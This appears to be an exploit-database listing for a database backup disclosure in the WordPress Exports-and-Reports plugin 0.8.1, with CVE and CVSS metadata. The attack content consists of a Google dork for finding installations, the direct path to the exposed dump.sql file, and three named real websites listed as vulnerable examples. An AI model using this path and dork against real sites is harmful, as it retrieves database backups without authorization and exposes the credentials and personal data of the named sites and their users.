Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2021-24639 | CWE-264 | $500 | Critical |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unkn0wn | High | Remote | 2018-12-11 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | 0.03739 | 0.64069 |
################################################################################################# # Exploit Title : WordPress Exports-and-Reports Plugins 0.8.1 Database Backup Disclosure # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 06/12/2018 # Vendor Homepage : wordpress.org/plugins/exports-and-reports/ # Software Download Link : downloads.wordpress.org/plugin/exports-and-reports.0.8.1.zip + github.com/sc0ttkclark/exports-and-reports/archive/master.zip # Tested On : Windows and Linux # Category : WebApps # Version Information : 0.8.1 # Exploit Risk : Medium # Google Dorks : inurl:''/wp-content/plugins/exports-and-reports/'' intext:''2018 British Orthopaedic Association'' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ] ################################################################################################# # Admin Panel Login Path : /wp-login.php # Exploit : /wp-content/plugins/exports-and-reports/assets/dump.sql ################################################################################################# # Example Vulnerable Sites => [+] minutemenpatriots.com/wp-content/plugins/exports-and-reports/assets/dump.sql [+] claudinhastoco.com/wp-content/plugins/exports-and-reports/assets/dump.sql [+] congress.boa.ac.uk/wp-content/plugins/exports-and-reports/assets/dump.sql ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.